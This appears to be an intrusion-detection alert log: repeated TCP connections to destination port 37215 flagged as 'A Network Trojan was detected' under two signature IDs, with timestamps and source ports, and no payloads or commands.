          Timestamp:06/08/24-15:05:32.404556
          SID:2835222
          Source Port:40038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128121
          SID:2829579
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673643
          SID:2829579
          Source Port:40132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178549
          SID:2829579
          Source Port:35126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406942
          SID:2835222
          Source Port:40530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133894
          SID:2829579
          Source Port:36694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354160
          SID:2829579
          Source Port:53218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470312
          SID:2829579
          Source Port:56158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403545
          SID:2829579
          Source Port:36718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517804
          SID:2829579
          Source Port:36230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817345
          SID:2835222
          Source Port:43416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163802
          SID:2835222
          Source Port:60946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353368
          SID:2829579
          Source Port:34644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166632
          SID:2835222
          Source Port:38746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165595
          SID:2829579
          Source Port:44578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739579
          SID:2829579
          Source Port:55130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240994
          SID:2835222
          Source Port:35564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059494
          SID:2835222
          Source Port:58692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466827
          SID:2829579
          Source Port:40302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108624
          SID:2835222
          Source Port:35558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020494
          SID:2829579
          Source Port:45232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745679
          SID:2835222
          Source Port:48906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806112
          SID:2835222
          Source Port:43808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806305
          SID:2829579
          Source Port:40202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273135
          SID:2829579
          Source Port:39554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270823
          SID:2829579
          Source Port:47698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130142
          SID:2829579
          Source Port:50610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600199
          SID:2835222
          Source Port:36314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295327
          SID:2829579
          Source Port:49234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173573
          SID:2829579
          Source Port:38122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884586
          SID:2829579
          Source Port:37288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791516
          SID:2829579
          Source Port:46348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465137
          SID:2835222
          Source Port:34368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108024
          SID:2835222
          Source Port:49756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550236
          SID:2829579
          Source Port:35782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517617
          SID:2829579
          Source Port:54298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671664
          SID:2829579
          Source Port:41578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351862
          SID:2829579
          Source Port:33238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355385
          SID:2829579
          Source Port:60478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.464116
          SID:2835222
          Source Port:47320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179357
          SID:2829579
          Source Port:46332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295344
          SID:2829579
          Source Port:59598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176204
          SID:2829579
          Source Port:38700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783293
          SID:2835222
          Source Port:41272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405087
          SID:2835222
          Source Port:50120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039348
          SID:2829579
          Source Port:54600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133137
          SID:2835222
          Source Port:55186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469091
          SID:2835222
          Source Port:36198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.805909
          SID:2829579
          Source Port:48630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510961
          SID:2835222
          Source Port:56412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788330
          SID:2835222
          Source Port:36114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748097
          SID:2829579
          Source Port:54604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449766
          SID:2835222
          Source Port:37390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460900
          SID:2835222
          Source Port:57224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542640
          SID:2835222
          Source Port:37608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599687
          SID:2835222
          Source Port:54180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015817
          SID:2829579
          Source Port:45738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175988
          SID:2829579
          Source Port:58910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109162
          SID:2835222
          Source Port:40976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467036
          SID:2829579
          Source Port:50378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157169
          SID:2835222
          Source Port:57336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410726
          SID:2829579
          Source Port:39516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780252
          SID:2829579
          Source Port:60218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736631
          SID:2829579
          Source Port:38792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897971
          SID:2829579
          Source Port:40426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174697
          SID:2835222
          Source Port:43662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744743
          SID:2835222
          Source Port:60828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355170
          SID:2829579
          Source Port:33932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355800
          SID:2835222
          Source Port:34844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787123
          SID:2835222
          Source Port:55148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444820
          SID:2829579
          Source Port:41872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266321
          SID:2835222
          Source Port:46588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515606
          SID:2829579
          Source Port:51030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274547
          SID:2829579
          Source Port:42180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817732
          SID:2829579
          Source Port:59212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743850
          SID:2835222
          Source Port:59188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269921
          SID:2829579
          Source Port:39046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159525
          SID:2835222
          Source Port:48544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112600
          SID:2829579
          Source Port:39182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441824
          SID:2835222
          Source Port:35918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131192
          SID:2829579
          Source Port:52102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152272
          SID:2829579
          Source Port:35584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746814
          SID:2829579
          Source Port:42384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599285
          SID:2835222
          Source Port:40272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158296
          SID:2835222
          Source Port:50192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237320
          SID:2829579
          Source Port:46826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108233
          SID:2829579
          Source Port:52888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266559
          SID:2835222
          Source Port:55782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465010
          SID:2835222
          Source Port:45314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837298
          SID:2829579
          Source Port:37412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099232
          SID:2829579
          Source Port:38452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260585
          SID:2835222
          Source Port:60194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175701
          SID:2829579
          Source Port:39064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518189
          SID:2835222
          Source Port:34816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667017
          SID:2835222
          Source Port:39824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155470
          SID:2829579
          Source Port:38852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158412
          SID:2835222
          Source Port:34700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177444
          SID:2829579
          Source Port:37260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466200
          SID:2829579
          Source Port:38092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601704
          SID:2835222
          Source Port:33152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108155
          SID:2835222
          Source Port:42018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109301
          SID:2829579
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819160
          SID:2835222
          Source Port:53986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897000
          SID:2829579
          Source Port:34280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800750
          SID:2835222
          Source Port:59880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708400
          SID:2829579
          Source Port:53644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744775
          SID:2829579
          Source Port:45966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134176
          SID:2835222
          Source Port:33242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745914
          SID:2829579
          Source Port:44642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739511
          SID:2829579
          Source Port:47068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791917
          SID:2829579
          Source Port:58672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542606
          SID:2835222
          Source Port:39992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172632
          SID:2835222
          Source Port:60214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600856
          SID:2829579
          Source Port:56674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860848
          SID:2829579
          Source Port:43092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517314
          SID:2829579
          Source Port:42782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841617
          SID:2835222
          Source Port:42754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162899
          SID:2835222
          Source Port:40014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495951
          SID:2835222
          Source Port:45308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.899187
          SID:2829579
          Source Port:50904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670262
          SID:2829579
          Source Port:47122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743812
          SID:2835222
          Source Port:47450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178562
          SID:2835222
          Source Port:40746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131092
          SID:2835222
          Source Port:57430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705882
          SID:2835222
          Source Port:34322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707350
          SID:2829579
          Source Port:35266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901801
          SID:2829579
          Source Port:38020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041232
          SID:2829579
          Source Port:43520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449154
          SID:2829579
          Source Port:47948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912347
          SID:2829579
          Source Port:38388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884450
          SID:2829579
          Source Port:35972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353668
          SID:2829579
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107607
          SID:2829579
          Source Port:56732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355890
          SID:2829579
          Source Port:44800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673043
          SID:2829579
          Source Port:43362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783657
          SID:2835222
          Source Port:60518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672869
          SID:2835222
          Source Port:57298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734582
          SID:2829579
          Source Port:50130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741877
          SID:2835222
          Source Port:43954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352527
          SID:2835222
          Source Port:49080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818637
          SID:2829579
          Source Port:35586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352980
          SID:2829579
          Source Port:47686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517094
          SID:2835222
          Source Port:57216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188113
          SID:2829579
          Source Port:41088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600536
          SID:2829579
          Source Port:46256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460126
          SID:2829579
          Source Port:54878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736931
          SID:2835222
          Source Port:48474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352991
          SID:2829579
          Source Port:60850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600200
          SID:2835222
          Source Port:57602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039840
          SID:2835222
          Source Port:49758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351684
          SID:2829579
          Source Port:54924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742670
          SID:2829579
          Source Port:56924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127439
          SID:2835222
          Source Port:59458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158813
          SID:2829579
          Source Port:48338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551642
          SID:2835222
          Source Port:51154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019197
          SID:2829579
          Source Port:50802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155518
          SID:2829579
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512139
          SID:2835222
          Source Port:32868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005518
          SID:2829579
          Source Port:42094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275385
          SID:2829579
          Source Port:50210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444013
          SID:2829579
          Source Port:33662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709788
          SID:2829579
          Source Port:57590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734897
          SID:2835222
          Source Port:38540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164693
          SID:2829579
          Source Port:60172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131193
          SID:2835222
          Source Port:42200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112723
          SID:2829579
          Source Port:36310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112531
          SID:2835222
          Source Port:38004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599969
          SID:2829579
          Source Port:44770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133071
          SID:2835222
          Source Port:55064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276460
          SID:2835222
          Source Port:55816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744180
          SID:2835222
          Source Port:51408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178067
          SID:2829579
          Source Port:55552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158985
          SID:2829579
          Source Port:60472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733607
          SID:2829579
          Source Port:36124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115400
          SID:2835222
          Source Port:33790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353071
          SID:2829579
          Source Port:53408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449190
          SID:2835222
          Source Port:39202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.863241
          SID:2829579
          Source Port:56784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110378
          SID:2829579
          Source Port:33324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599236
          SID:2829579
          Source Port:37054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266450
          SID:2829579
          Source Port:42634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796161
          SID:2829579
          Source Port:40812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020376
          SID:2829579
          Source Port:58314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792519
          SID:2835222
          Source Port:56804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707704
          SID:2835222
          Source Port:47312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056624
          SID:2829579
          Source Port:36236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729698
          SID:2829579
          Source Port:54298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152402
          SID:2835222
          Source Port:39932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787320
          SID:2835222
          Source Port:45302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783583
          SID:2829579
          Source Port:48080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114408
          SID:2835222
          Source Port:46416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258684
          SID:2835222
          Source Port:50478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354764
          SID:2829579
          Source Port:45000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152335
          SID:2835222
          Source Port:57626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895944
          SID:2835222
          Source Port:53392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.145301
          SID:2835222
          Source Port:42114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158732
          SID:2835222
          Source Port:41876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549957
